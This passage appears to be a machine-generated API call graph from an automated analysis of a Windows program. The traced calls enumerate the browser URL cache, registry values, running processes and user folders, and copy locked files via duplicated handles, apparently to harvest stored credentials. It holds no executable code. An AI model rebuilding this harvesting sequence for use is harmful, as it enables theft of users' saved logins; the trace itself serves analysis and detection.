38202->38209 38211 40d65d GetPrivateProfileStringW 38203->38211 38205 40db3e 38212 40d65d GetPrivateProfileStringW 38205->38212 38207 40db4f 38213 40d65d GetPrivateProfileStringW 38207->38213 38209->37971 38210->38202 38211->38205 38212->38207 38213->38209 38249 40eaff 38214->38249 38218 411ae2 memset 38217->38218 38219 411b8f 38217->38219 38290 409bca GetModuleFileNameW 38218->38290 38231 411a8b 38219->38231 38221 411b0a wcsrchr 38222 411b22 wcscat 38221->38222 38223 411b1f 38221->38223 38291 414770 wcscpy wcscpy wcscpy CloseHandle 38222->38291 38223->38222 38225 411b67 38292 402afb 38225->38292 38229 411b7f 38348 40ea13 SendMessageW memset SendMessageW 38229->38348 38232 402afb 27 API calls 38231->38232 38233 411ac0 38232->38233 38234 4110dc 38233->38234 38235 41113e 38234->38235 38240 4110f0 38234->38240 38373 40969c LoadCursorW SetCursor 38235->38373 38237 411143 38374 4032b4 38237->38374 38392 444a54 38237->38392 38238 4110f7 _wcsicmp 38238->38240 38239 411157 38241 40ada2 _wcsicmp 38239->38241 38240->38235 38240->38238 38395 410c46 10 API calls 38240->38395 38244 411167 38241->38244 38242 4111af 38244->38242 38245 4111a6 qsort 38244->38245 38245->38242 38248->38048 38250 40eb10 38249->38250 38263 40e8e0 38250->38263 38253 40eb6c memcpy memcpy 38254 40ebe1 38253->38254 38255 40ebb7 38253->38255 38254->38253 38256 40ebf2 ??2@YAPAXI ??2@YAPAXI 38254->38256 38255->38254 38257 40d134 16 API calls 38255->38257 38258 40ec2e ??2@YAPAXI 38256->38258 38261 40ec65 38256->38261 38257->38255 38258->38261 38273 40ea7f 38261->38273 38262 402f49 38262->38048 38264 40e8f2 38263->38264 38265 40e8eb ??3@YAXPAX 38263->38265 38266 40e900 38264->38266 38267 40e8f9 ??3@YAXPAX 38264->38267 38265->38264 38268 40e911 38266->38268 38269 40e90a ??3@YAXPAX 38266->38269 38267->38266 38270 40e931 ??2@YAPAXI ??2@YAPAXI 38268->38270 38271 40e921 ??3@YAXPAX 38268->38271 38272 40e92a ??3@YAXPAX 38268->38272 38269->38268 38270->38253 38271->38272 38272->38270 38274 40aa04 free 38273->38274 38275 40ea88 38274->38275 38276 40aa04 free 38275->38276 38277 40ea90 38276->38277 38278 40aa04 free 38277->38278 38279 40ea98 38278->38279 38280 40aa04 free 38279->38280 38281 40eaa0 38280->38281 38282 40a9ce 4 API calls 38281->38282 38283 40eab3 38282->38283 38284 40a9ce 4 API calls 38283->38284 38285 40eabd 38284->38285 38286 40a9ce 4 API calls 38285->38286 38287 40eac7 38286->38287 38288 40a9ce 4 API calls 38287->38288 38289 40ead1 38288->38289 38289->38262 38290->38221 38291->38225 38349 40b2cc 38292->38349 38294 402b0a 38295 40b2cc 27 API calls 38294->38295 38296 402b23 38295->38296 38297 40b2cc 27 API calls 38296->38297 38298 402b3a 38297->38298 38299 40b2cc 27 API calls 38298->38299 38300 402b54 38299->38300 38301 40b2cc 27 API calls 38300->38301 38302 402b6b 38301->38302 38303 40b2cc 27 API calls 38302->38303 38304 402b82 38303->38304 38305 40b2cc 27 API calls 38304->38305 38306 402b99 38305->38306 38307 40b2cc 27 API calls 38306->38307 38308 402bb0 38307->38308 38309 40b2cc 27 API calls 38308->38309 38310 402bc7 38309->38310 38311 40b2cc 27 API calls 38310->38311 38312 402bde 38311->38312 38313 40b2cc 27 API calls 38312->38313 38314 402bf5 38313->38314 38315 40b2cc 27 API calls 38314->38315 38316 402c0c 38315->38316 38317 40b2cc 27 API calls 38316->38317 38318 402c23 38317->38318 38319 40b2cc 27 API calls 38318->38319 38320 402c3a 38319->38320 38321 40b2cc 27 API calls 38320->38321 38322 402c51 38321->38322 38323 40b2cc 27 API calls 38322->38323 38324 402c68 38323->38324 38325 40b2cc 27 API calls 38324->38325 38326 402c7f 38325->38326 38327 40b2cc 27 API calls 38326->38327 38328 402c99 38327->38328 38329 40b2cc 27 API calls 38328->38329 38330 402cb3 38329->38330 38331 40b2cc 27 API calls 38330->38331 38332 402cd5 38331->38332 38333 40b2cc 27 API calls 38332->38333 38334 402cf0 38333->38334 38335 40b2cc 27 API calls 38334->38335 38336 402d0b 38335->38336 38337 40b2cc 27 API calls 38336->38337 38338 402d26 38337->38338 38339 40b2cc 27 API calls 38338->38339 38340 402d3e 38339->38340 38341 40b2cc 27 API calls 38340->38341 38342 402d59 38341->38342 38343 40b2cc 27 API calls 38342->38343 38344 402d78 38343->38344 38345 40b2cc 27 API calls 38344->38345 38346 402d93 38345->38346 38347 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38346->38347 38347->38229 38348->38219 38352 40b58d 38349->38352 38351 40b2d1 38351->38294 38353 40b5a4 GetModuleHandleW FindResourceW 38352->38353 38354 40b62e 38352->38354 38355 40b5c2 LoadResource 38353->38355 38357 40b5e7 38353->38357 38354->38351 38356 40b5d0 SizeofResource LockResource 38355->38356 38355->38357 38356->38357 38357->38354 38365 40afcf 38357->38365 38359 40b608 memcpy 38368 40b4d3 memcpy 38359->38368 38361 40b61e 38369 40b3c1 18 API calls 38361->38369 38363 40b626 38370 40b04b 38363->38370 38366 40b04b ??3@YAXPAX 38365->38366 38367 40afd7 ??2@YAPAXI 38366->38367 38367->38359 38368->38361 38369->38363 38371 40b051 ??3@YAXPAX 38370->38371 38372 40b05f 38370->38372 38371->38372 38372->38354 38373->38237 38375 4032c4 38374->38375 38376 40b633 free 38375->38376 38377 403316 38376->38377 38396 44553b 38377->38396 38381 403480 38594 40368c 15 API calls 38381->38594 38383 403489 38384 40b633 free 38383->38384 38386 403495 38384->38386 38385 40333c 38385->38381 38387 4033a9 memset memcpy 38385->38387 38388 4033ec wcscmp 38385->38388 38592 4028e7 11 API calls 38385->38592 38593 40f508 6 API calls 38385->38593 38386->38239 38387->38385 38387->38388 38388->38385 38390 403421 _wcsicmp 38390->38385 38393 444a64 FreeLibrary 38392->38393 38394 444a83 38392->38394 38393->38394 38394->38239 38395->38240 38397 445548 38396->38397 38398 445599 38397->38398 38595 40c768 38397->38595 38399 4455a8 memset 38398->38399 38541 4457f2 38398->38541 38679 403988 38399->38679 38405 4455e5 38414 445672 38405->38414 38424 44560f 38405->38424 38407 4458bb memset memset 38411 414c2e 16 API calls 38407->38411 38409 4459ed 38415 445a00 memset memset 38409->38415 38416 445b22 38409->38416 38410 44595e memset memset 38417 414c2e 16 API calls 38410->38417 38418 4458f9 38411->38418 38412 44557a 38419 44558c 38412->38419 38659 4136c0 38412->38659 38690 403fbe memset memset memset memset memset 38414->38690 38421 414c2e 16 API calls 38415->38421 38426 445bca 38416->38426 38427 445b38 memset memset memset 38416->38427 38422 44599c 38417->38422 38423 40b2cc 27 API calls 38418->38423 38663 444b06 38419->38663 38431 445a3e 38421->38431 38433 40b2cc 27 API calls 38422->38433 38434 445909 38423->38434 38436 4087b3 335 API calls 38424->38436 38435 445c8b memset memset 38426->38435 38492 445cf0 38426->38492 38439 445bd4 38427->38439 38440 445b98 38427->38440 38428 445849 38873 40b1ab free free 38428->38873 38441 40b2cc 27 API calls 38431->38441 38449 4459ac 38433->38449 38445 409d1f 6 API calls 38434->38445 38450 414c2e 16 API calls 38435->38450 38446 445621 38436->38446 38438 44589f 38874 40b1ab free free 38438->38874 38828 414c2e 38439->38828 38440->38439 38452 445ba2 38440->38452 38454 445a4f 38441->38454 38444 403335 38591 4452e5 43 API calls 38444->38591 38460 445919 38445->38460 38859 4454bf 20 API calls 38446->38859 38447 445823 38447->38428 38469 4087b3 335 API calls 38447->38469 38448 445854 38455 4458aa 38448->38455 38805 403c9c memset memset memset memset memset 38448->38805 38461 409d1f 6 API calls 38449->38461 38462 445cc9 38450->38462 38964 4099c6 wcslen 38452->38964 38453 4456b2 38861 40b1ab free free 38453->38861 38466 409d1f 6 API calls 38454->38466 38455->38407 38488 44594a 38455->38488 38458 445d3d 38487 40b2cc 27 API calls 38458->38487 38459 445d88 memset memset memset 38470 414c2e 16 API calls 38459->38470 38875 409b98 GetFileAttributesW 38460->38875 38471 4459bc 38461->38471 38472 409d1f 6 API calls 38462->38472 38463 445879 38463->38438 38482 4087b3 335 API calls 38463->38482 38465 445680 38465->38453 38713 4087b3 memset 38465->38713 38475 445a63 38466->38475 38467 40b2cc 27 API calls 38476 445bf3 38467->38476 38469->38447 38479 445dde 38470->38479 38940 409b98 GetFileAttributesW 38471->38940 38481 445ce1 38472->38481 38473 445bb3 38967 445403 memset 38473->38967 38485 40b2cc 27 API calls 38475->38485 38844 409d1f wcslen wcslen 38476->38844 38477 445928 38477->38488 38876 40b6ef 38477->38876 38489 40b2cc 27 API calls 38479->38489 38984 409b98 GetFileAttributesW 38481->38984 38482->38463 38494 445a94 38485->38494 38497 445d54 _wcsicmp 38487->38497 38488->38409 38488->38410 38500 445def 38489->38500 38490 4459cb 38490->38409 38507 40b6ef 249 API calls 38490->38507 38492->38444 38492->38458 38492->38459 38493 445389 255 API calls 38493->38426 38941 40ae18 38494->38941 38495 44566d 38495->38541 38764 413d4c 38495->38764 38504 445d71 38497->38504 38568 445d67 38497->38568 38499 445665 38860 40b1ab free free 38499->38860 38505 409d1f 6 API calls 38500->38505 38985 445093 23 API calls 38504->38985 38512 445e03 38505->38512 38507->38409 38508 4456d8 38514 40b2cc 27 API calls 38508->38514 38511 44563c 38511->38499 38517 4087b3 335 API calls 38511->38517 38986 409b98 GetFileAttributesW 38512->38986 38513 40b6ef 249 API calls 38513->38444 38519 4456e2 38514->38519 38515 40b2cc 27 API calls 38520 445c23 38515->38520 38516 445d83 38516->38444 38517->38511 38862 413fa6 _wcsicmp _wcsicmp 38519->38862 38524 409d1f 6 API calls 38520->38524 38522 445e12 38528 445e6b 38522->38528 38535 40b2cc 27 API calls 38522->38535 38526 445c37 38524->38526 38525 4456eb 38531 4456fd memset memset memset memset 38525->38531 38532 4457ea 38525->38532 38533 445389 255 API calls 38526->38533 38527 445b17 38961 40aebe 38527->38961 38988 445093 23 API calls 38528->38988 38863 409c70 wcscpy wcsrchr 38531->38863 38866 413d29 38532->38866 38539 445c47 38533->38539 38540 445e33 38535->38540 38537 445e7e 38542 445f67 38537->38542 38545 40b2cc 27 API calls 38539->38545 38546 409d1f 6 API calls 38540->38546 38541->38448 38782 403e2d memset memset memset memset memset 38541->38782 38548 40b2cc 27 API calls 38542->38548 38543 445ab2 memset 38549 40b2cc 27 API calls 38543->38549 38551 445c53 38545->38551 38547 445e47 38546->38547 38987 409b98 GetFileAttributesW 38547->38987 38553 445f73 38548->38553 38554 445aa1 38549->38554 38550 409c70 2 API calls 38555 44577e 38550->38555 38556 409d1f 6 API calls 38551->38556 38558 409d1f 6 API calls 38553->38558 38554->38527 38554->38543 38559 409d1f 6 API calls 38554->38559 38567 445389 255 API calls 38554->38567 38948 40add4 38554->38948 38953 40ae51 38554->38953 38560 409c70 2 API calls 38555->38560 38561 445c67 38556->38561 38557 445e56 38557->38528 38565 445e83 memset 38557->38565 38562 445f87 38558->38562 38559->38554 38563 44578d 38560->38563 38564 445389 255 API calls 38561->38564 38991 409b98 GetFileAttributesW 38562->38991 38563->38532 38570 40b2cc 27 API calls 38563->38570 38564->38426 38569 40b2cc 27 API calls 38565->38569 38567->38554 38568->38444 38568->38513 38571 445eab 38569->38571 38572 4457a8 38570->38572 38573 409d1f 6 API calls 38571->38573 38574 409d1f 6 API calls 38572->38574 38575 445ebf 38573->38575 38576 4457b8 38574->38576 38577 40ae18 9 API calls 38575->38577 38865 409b98 GetFileAttributesW 38576->38865 38587 445ef5 38577->38587 38579 4457c7 38579->38532 38581 4087b3 335 API calls 38579->38581 38580 40ae51 9 API calls 38580->38587 38581->38532 38582 445f5c 38584 40aebe FindClose 38582->38584 38583 40add4 2 API calls 38583->38587 38584->38542 38585 40b2cc 27 API calls 38585->38587 38586 409d1f 6 API calls 38586->38587 38587->38580 38587->38582 38587->38583 38587->38585 38587->38586 38589 445f3a 38587->38589 38989 409b98 GetFileAttributesW 38587->38989 38990 445093 23 API calls 38589->38990 38591->38385 38592->38390 38593->38385 38594->38383 38596 40c775 38595->38596 38992 40b1ab free free 38596->38992 38598 40c788 38993 40b1ab free free 38598->38993 38600 40c790 38994 40b1ab free free 38600->38994 38602 40c798 38603 40aa04 free 38602->38603 38604 40c7a0 38603->38604 38995 40c274 memset 38604->38995 38609 40a8ab 9 API calls 38610 40c7c3 38609->38610 38611 40a8ab 9 API calls 38610->38611 38612 40c7d0 38611->38612 39024 40c3c3 38612->39024 38616 40c877 38625 40bdb0 38616->38625 38617 40c86c 39052 4053fe 37 API calls 38617->39052 38620 40c813 _wcslwr 39050 40c634 47 API calls 38620->39050 38622 40c829 wcslen 38623 40c7e5 38622->38623 38623->38616 38623->38617 39049 40a706 wcslen memcpy 38623->39049 39051 40c634 47 API calls 38623->39051 39186 404363 38625->39186 38630 40b2cc 27 API calls 38631 40be02 wcslen 38630->38631 38632 40bf5d 38631->38632 38640 40be1e 38631->38640 39203 40440c 38632->39203 38633 40be26 wcsncmp 38633->38640 38636 40be7d memset 38637 40bea7 memcpy 38636->38637 38636->38640 38638 40bf11 wcschr 38637->38638 38637->38640 38638->38640 38639 40b2cc 27 API calls 38641 40bef6 _wcsnicmp 38639->38641 38640->38632 38640->38633 38640->38636 38640->38637 38640->38638 38640->38639 38642 40bf43 LocalFree 38640->38642 39206 40bd5d 28 API calls 38640->39206 39207 404423 38640->39207 38641->38638 38641->38640 38642->38640 38643 4135f7 39219 4135e0 38643->39219 38646 40b2cc 27 API calls 38647 41360d 38646->38647 38648 40a804 8 API calls 38647->38648 38649 413613 38648->38649 38650 41363e 38649->38650 38652 40b273 27 API calls 38649->38652 38651 4135e0 FreeLibrary 38650->38651 38653 413643 38651->38653 38654 413625 38652->38654 38653->38412 38654->38650 38655 413648 38654->38655 38656 413658 38655->38656 38657 4135e0 FreeLibrary 38655->38657 38656->38412 38658 413666 38657->38658 38658->38412 38661 4136e2 38659->38661 38660 413827 38858 41366b FreeLibrary 38660->38858 38661->38660 38662 4137ac CoTaskMemFree 38661->38662 38662->38661 39222 4449b9 38663->39222 38666 444c1f 38666->38398 38667 4449b9 35 API calls 38669 444b4b 38667->38669 38668 444c15 38671 4449b9 35 API calls 38668->38671 38669->38668 39242 444972 GetVersionExW 38669->39242 38671->38666 38672 444b8c 38673 444b99 memcmp 38672->38673 38674 444c0b 38672->38674 39243 444aa5 35 API calls 38672->39243 39244 40a7a0 GetVersionExW 38672->39244 39245 444a85 35 API calls 38672->39245 38673->38672 39246 444a85 35 API calls 38674->39246 38680 40399d 38679->38680 39247 403a16 38680->39247 38682 403a09 39261 40b1ab free free 38682->39261 38684 403a12 wcsrchr 38684->38405 38685 4039a3 38685->38682 38688 4039f4 38685->38688 39258 40a02c CreateFileW 38685->39258 38688->38682 38689 4099c6 2 API calls 38688->38689 38689->38682 38691 414c2e 16 API calls 38690->38691 38692 404048 38691->38692 38693 414c2e 16 API calls 38692->38693 38694 404056 38693->38694 38695 409d1f 6 API calls 38694->38695 38696 404073 38695->38696 38697 409d1f 6 API calls 38696->38697 38698 40408e 38697->38698 38699 409d1f 6 API calls 38698->38699 38700 4040a6 38699->38700 38701 403af5 20 API calls 38700->38701 38702 4040ba 38701->38702 38703 403af5 20 API calls 38702->38703 38704 4040cb 38703->38704 39288 40414f memset 38704->39288 38706 404140 39302 40b1ab free free 38706->39302 38708 4040ec memset 38711 4040e0 38708->38711 38709 404148 38709->38465 38710 4099c6 2 API calls 38710->38711 38711->38706 38711->38708 38711->38710 38712 40a8ab 9 API calls 38711->38712 38712->38711 39315 40a6e6 WideCharToMultiByte 38713->39315 38715 4087ed 39316 4095d9 memset 38715->39316 38718 408809 memset memset memset memset memset 38719 40b2cc 27 API calls 38718->38719 38720 4088a1 38719->38720 38721 409d1f 6 API calls 38720->38721 38722 4088b1 38721->38722 38723 40b2cc 27 API calls 38722->38723 38724 4088c0 38723->38724 38725 409d1f 6 API calls 38724->38725 38726 4088d0 38725->38726 38727 40b2cc 27 API calls 38726->38727 38728 4088df 38727->38728 38729 409d1f 6 API calls 38728->38729 38730 4088ef 38729->38730 38731 40b2cc 27 API calls 38730->38731 38750 408953 38750->38465 38765 40b633 free 38764->38765 38766 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38765->38766 38767 413f00 Process32NextW 38766->38767 38768 413da5 OpenProcess 38767->38768 38769 413f17 CloseHandle 38767->38769 38770 413df3 memset 38768->38770 38773 413eb0 38768->38773 38769->38508 39365 413f27 38770->39365 38772 413ebf free 38772->38773 38773->38767 38773->38772 38774 4099f4 3 API calls 38773->38774 38774->38773 38775 413e37 GetModuleHandleW 38777 413e46 38775->38777 38779 413e1f 38775->38779 38777->38779 38778 413e6a QueryFullProcessImageNameW 38778->38779 38779->38775 38779->38778 39370 413959 38779->39370 39386 413ca4 38779->39386 38781 413ea2 CloseHandle 38781->38773 38783 414c2e 16 API calls 38782->38783 38784 403eb7 38783->38784 38785 414c2e 16 API calls 38784->38785 38786 403ec5 38785->38786 38787 409d1f 6 API calls 38786->38787 38788 403ee2 38787->38788 38789 409d1f 6 API calls 38788->38789 38790 403efd 38789->38790 38791 409d1f 6 API calls 38790->38791 38792 403f15 38791->38792 38793 403af5 20 API calls 38792->38793 38794 403f29 38793->38794 38795 403af5 20 API calls 38794->38795 38796 403f3a 38795->38796 38797 40414f 33 API calls 38796->38797 38803 403f4f 38797->38803 38798 403faf 39399 40b1ab free free 38798->39399 38799 403f5b memset 38799->38803 38801 403fb7 38801->38447 38802 4099c6 2 API calls 38802->38803 38803->38798 38803->38799 38803->38802 38804 40a8ab 9 API calls 38803->38804 38804->38803 38806 414c2e 16 API calls 38805->38806 38807 403d26 38806->38807 38808 414c2e 16 API calls 38807->38808 38809 403d34 38808->38809 38810 409d1f 6 API calls 38809->38810 38811 403d51 38810->38811 38812 409d1f 6 API calls 38811->38812 38813 403d6c 38812->38813 38814 409d1f 6 API calls 38813->38814 38815 403d84 38814->38815 38816 403af5 20 API calls 38815->38816 38817 403d98 38816->38817 38818 403af5 20 API calls 38817->38818 38819 403da9 38818->38819 38820 40414f 33 API calls 38819->38820 38826 403dbe 38820->38826 38821 403e1e 39400 40b1ab free free 38821->39400 38822 403dca memset 38822->38826 38824 403e26 38824->38463 38825 4099c6 2 API calls 38825->38826 38826->38821 38826->38822 38826->38825 38827 40a8ab 9 API calls 38826->38827 38827->38826 38829 414b81 8 API calls 38828->38829 38830 414c40 38829->38830 38831 414c73 memset 38830->38831 39401 409cea 38830->39401 38833 414c94 38831->38833 39404 414592 RegOpenKeyExW 38833->39404 38835 414c64 SHGetSpecialFolderPathW 38837 414d0b 38835->38837 38837->38467 38838 414cc1 38839 414cf4 wcscpy 38838->38839 39405 414bb0 wcscpy 38838->39405 38839->38837 38841 414cd2 39406 4145ac RegQueryValueExW 38841->39406 38843 414ce9 RegCloseKey 38843->38839 38845 409d62 38844->38845 38846 409d43 wcscpy 38844->38846 38849 445389 38845->38849 38847 409719 2 API calls 38846->38847 38848 409d51 wcscat 38847->38848 38848->38845 38850 40ae18 9 API calls 38849->38850 38855 4453c4 38850->38855 38851 40ae51 9 API calls 38851->38855 38852 4453f3 38854 40aebe FindClose 38852->38854 38853 40add4 2 API calls 38853->38855 38856 4453fe 38854->38856 38855->38851 38855->38852 38855->38853 38857 445403 250 API calls 38855->38857 38856->38515 38857->38855 38858->38419 38859->38511 38860->38495 38861->38495 38862->38525 38864 409c89 38863->38864 38864->38550 38865->38579 38867 413d39 38866->38867 38868 413d2f FreeLibrary 38866->38868 38869 40b633 free 38867->38869 38868->38867 38870 413d42 38869->38870 38871 40b633 free 38870->38871 38872 413d4a 38871->38872 38872->38541 38873->38448 38874->38455 38875->38477 38877 44db70 38876->38877 38878 40b6fc memset 38877->38878 38879 409c70 2 API calls 38878->38879 38880 40b732 wcsrchr 38879->38880 38881 40b743 38880->38881 38882 40b746 memset 38880->38882 38881->38882 38883 40b2cc 27 API calls 38882->38883 38884 40b76f 38883->38884 38885 409d1f 6 API calls 38884->38885 38886 40b783 38885->38886 39407 409b98 GetFileAttributesW 38886->39407 38888 40b792 38890 409c70 2 API calls 38888->38890 38902 40b7c2 38888->38902 38892 40b7a5 38890->38892 38895 40b2cc 27 API calls 38892->38895 38893 40b837 CloseHandle 38897 40b83e memset 38893->38897 38894 40b817 39491 409a45 GetTempPathW 38894->39491 38898 40b7b2 38895->38898 39441 40a6e6 WideCharToMultiByte 38897->39441 38899 409d1f 6 API calls 38898->38899 38899->38902 38900 40b827 38900->38897 39408 40bb98 38902->39408 38903 40b866 39442 444432 38903->39442 38906 40bad5 38909 40b04b ??3@YAXPAX 38906->38909 38907 40b273 27 API calls 38908 40b89a 38907->38908 39488 438552 38908->39488 38911 40baf3 38909->38911 38911->38488 38913 40bacd 39522 443d90 110 API calls 38913->39522 38916 40bac6 39521 424f26 122 API calls 38916->39521 38917 40b8bd memset 39512 425413 17 API calls 38917->39512 38920 425413 17 API calls 38938 40b8b8 38920->38938 38923 40a71b MultiByteToWideChar 38923->38938 38924 40a734 MultiByteToWideChar 38924->38938 38927 40b9b5 memcmp 38927->38938 38928 4099c6 2 API calls 38928->38938 38929 404423 37 API calls 38929->38938 38932 4251c4 136 API calls 38932->38938 38933 40bb3e memset memcpy 39523 40a734 MultiByteToWideChar 38933->39523 38935 40bb88 LocalFree 38935->38938 38938->38916 38938->38917 38938->38920 38938->38923 38938->38924 38938->38927 38938->38928 38938->38929 38938->38932 38938->38933 38939 40ba5f memcmp 38938->38939 39513 4253ef 16 API calls 38938->39513 39514 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38938->39514 39515 4253af 17 API calls 38938->39515 39516 4253cf 17 API calls 38938->39516 39517 447280 memset 38938->39517 39518 447960 memset memcpy memcpy memcpy 38938->39518 39519 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38938->39519 39520 447920 memcpy memcpy memcpy 38938->39520 38939->38938 38940->38490 38942 40aebe FindClose 38941->38942 38943 40ae21 38942->38943 38944 4099c6 2 API calls 38943->38944 38945 40ae35 38944->38945 38946 409d1f 6 API calls 38945->38946 38947 40ae49 38946->38947 38947->38554 38949 40ade0 38948->38949 38952 40ae0f 38948->38952 38950 40ade7 wcscmp 38949->38950 38949->38952 38951 40adfe wcscmp 38950->38951 38950->38952 38951->38952 38952->38554 38954 40ae7b FindNextFileW 38953->38954 38955 40ae5c FindFirstFileW 38953->38955 38956 40ae94 38954->38956 38957 40ae8f 38954->38957 38955->38956 38959 40aeb6 38956->38959 38960 409d1f 6 API calls 38956->38960 38958 40aebe FindClose 38957->38958 38958->38956 38959->38554 38960->38959 38962 40aed1 38961->38962 38963 40aec7 FindClose 38961->38963 38962->38416 38963->38962 38965 4099d7 38964->38965 38966 4099da memcpy 38964->38966 38965->38966 38966->38473 38968 40b2cc 27 API calls 38967->38968 38969 44543f 38968->38969 38970 409d1f 6 API calls 38969->38970 38971 44544f 38970->38971 39912 409b98 GetFileAttributesW 38971->39912 38973 44545e 38974 445476 38973->38974 38975 40b6ef 249 API calls 38973->38975 38976 40b2cc 27 API calls 38974->38976 38975->38974 38977 445482 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 445492 38978->38979 39913 409b98 GetFileAttributesW 38979->39913 38981 4454a1 38982 4454b9 38981->38982 38983 40b6ef 249 API calls 38981->38983 38982->38493 38983->38982 38984->38492 38985->38516 38986->38522 38987->38557 38988->38537 38989->38587 38990->38587 38991->38568 38992->38598 38993->38600 38994->38602 38996 414c2e 16 API calls 38995->38996 38997 40c2ae 38996->38997 39053 40c1d3 38997->39053 39002 40c3be 39019 40a8ab 39002->39019 39003 40afcf 2 API calls 39004 40c2fd FindFirstUrlCacheEntryW 39003->39004 39005 40c3b6 39004->39005 39006 40c31e wcschr 39004->39006 39007 40b04b ??3@YAXPAX 39005->39007 39008 40c331 39006->39008 39009 40c35e FindNextUrlCacheEntryW 39006->39009 39007->39002 39011 40a8ab 9 API calls 39008->39011 39009->39006 39010 40c373 GetLastError 39009->39010 39012 40c3ad FindCloseUrlCache 39010->39012 39013 40c37e 39010->39013 39014 40c33e wcschr 39011->39014 39012->39005 39015 40afcf 2 API calls 39013->39015 39014->39009 39016 40c34f 39014->39016 39017 40c391 FindNextUrlCacheEntryW 39015->39017 39018 40a8ab 9 API calls 39016->39018 39017->39006 39017->39012 39018->39009 39147 40a97a 39019->39147 39022 40a8cc 39022->38609 39023 40a8d0 7 API calls 39023->39022 39152 40b1ab free free 39024->39152 39026 40c3dd 39027 40b2cc 27 API calls 39026->39027 39028 40c3e7 39027->39028 39153 414592 RegOpenKeyExW 39028->39153 39030 40c3f4 39031 40c50e 39030->39031 39032 40c3ff 39030->39032 39046 405337 39031->39046 39033 40a9ce 4 API calls 39032->39033 39034 40c418 memset 39033->39034 39154 40aa1d 39034->39154 39037 40c471 39039 40c47a _wcsupr 39037->39039 39038 40c505 RegCloseKey 39038->39031 39040 40a8d0 7 API calls 39039->39040 39041 40c498 39040->39041 39042 40a8d0 7 API calls 39041->39042 39043 40c4ac memset 39042->39043 39044 40aa1d 39043->39044 39045 40c4e4 RegEnumValueW 39044->39045 39045->39038 39045->39039 39156 405220 39046->39156 39048 405340 39048->38623 39049->38620 39050->38622 39051->38623 39052->38616 39054 40ae18 9 API calls 39053->39054 39060 40c210 39054->39060 39055 40ae51 9 API calls 39055->39060 39056 40c264 39057 40aebe FindClose 39056->39057 39059 40c26f 39057->39059 39058 40add4 2 API calls 39058->39060 39065 40e5ed memset memset 39059->39065 39060->39055 39060->39056 39060->39058 39061 40c231 _wcsicmp 39060->39061 39062 40c1d3 34 API calls 39060->39062 39061->39060 39063 40c248 39061->39063 39062->39060 39078 40c084 21 API calls 39063->39078 39066 414c2e 16 API calls 39065->39066 39067 40e63f 39066->39067 39068 409d1f 6 API calls 39067->39068 39069 40e658 39068->39069 39079 409b98 GetFileAttributesW 39069->39079 39071 40e667 39072 409d1f 6 API calls 39071->39072 39074 40e680 39071->39074 39072->39074 39080 409b98 GetFileAttributesW 39074->39080 39075 40e68f 39076 40c2d8 39075->39076 39081 40e4b2 39075->39081 39076->39002 39076->39003 39078->39060 39079->39071 39080->39075 39102 40e01e 39081->39102 39083 40e593 39084 40e5b0 39083->39084 39085 40e59c DeleteFileW 39083->39085 39086 40b04b ??3@YAXPAX 39084->39086 39085->39084 39088 40e5bb 39086->39088 39087 40e521 39087->39083 39125 40e175 39087->39125 39090 40e5c4 CloseHandle 39088->39090 39091 40e5cc 39088->39091 39090->39091 39093 40b633 free 39091->39093 39092 40e573 39094 40e584 39092->39094 39095 40e57c CloseHandle 39092->39095 39096 40e5db 39093->39096 39146 40b1ab free free 39094->39146 39095->39094 39097 40b633 free 39096->39097 39099 40e5e3 39097->39099 39099->39076 39101 40e540 39101->39092 39145 40e2ab 30 API calls 39101->39145 39103 406214 22 API calls 39102->39103 39104 40e03c 39103->39104 39105 40e16b 39104->39105 39106 40dd85 60 API calls 39104->39106 39105->39087 39107 40e06b 39106->39107 39107->39105 39108 40afcf ??2@YAPAXI ??3@YAXPAX 39107->39108 39109 40e08d OpenProcess 39108->39109 39110 40e0a4 GetCurrentProcess DuplicateHandle 39109->39110 39114 40e152 39109->39114 39111 40e0d0 GetFileSize 39110->39111 39112 40e14a CloseHandle 39110->39112 39115 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39111->39115 39112->39114 39113 40e160 39117 40b04b ??3@YAXPAX 39113->39117 39114->39113 39116 406214 22 API calls 39114->39116 39118 40e0ea 39115->39118 39116->39113 39117->39105 39119 4096dc CreateFileW 39118->39119 39120 40e0f1 CreateFileMappingW 39119->39120 39121 40e140 CloseHandle CloseHandle 39120->39121 39122 40e10b MapViewOfFile 39120->39122 39121->39112 39123 40e13b CloseHandle 39122->39123 39124 40e11f WriteFile UnmapViewOfFile 39122->39124 39123->39121 39124->39123 39126 40e18c 39125->39126 39127 406b90 11 API calls 39126->39127 39128 40e19f 39127->39128 39129 40e1a7 memset 39128->39129 39130 40e299 39128->39130 39135 40e1e8 39129->39135 39131 4069a3 ??3@YAXPAX free 39130->39131 39132 40e2a4 39131->39132 39132->39101 39133 406e8f 13 API calls 39133->39135 39134 406b53 SetFilePointerEx ReadFile 39134->39135 39135->39133 39135->39134 39136 40dd50 _wcsicmp 39135->39136 39137 40e283 39135->39137 39141 40742e 8 API calls 39135->39141 39142 40aae3 wcslen wcslen _memicmp 39135->39142 39143 40e244 _snwprintf 39135->39143 39136->39135 39138 40e291 39137->39138 39139 40e288 free 39137->39139 39140 40aa04 free 39138->39140 39139->39138 39140->39130 39141->39135 39142->39135 39144 40a8d0 7 API calls 39143->39144 39144->39135 39145->39101 39146->39083 39149 40a980 39147->39149 39148 40a8bb 39148->39022 39148->39023 39149->39148 39150 40a995 _wcsicmp 39149->39150 39151 40a99c wcscmp 39149->39151 39150->39149 39151->39149 39152->39026 39153->39030 39155 40aa23 RegEnumValueW 39154->39155 39155->39037 39155->39038 39157 40522a 39156->39157 39182 405329 39156->39182 39158 40b2cc 27 API calls 39157->39158 39159 405234 39158->39159 39160 40a804 8 API calls 39159->39160 39161 40523a 39160->39161 39183 40b273 39161->39183 39163 405248 _mbscpy _mbscat 39164 40526c 39163->39164 39165 40b273 27 API calls 39164->39165 39166 405279 39165->39166 39167 40b273 27 API calls 39166->39167 39168 40528f 39167->39168 39169 40b273 27 API calls 39168->39169 39170 4052a5 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4052bb 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4052d1 39173->39174 39175 40b273 27 API calls 39174->39175 39176 4052e7 39175->39176 39177 40b273 27 API calls 39176->39177 39178 4052fd 39177->39178 39179 40b273 27 API calls 39178->39179 39180 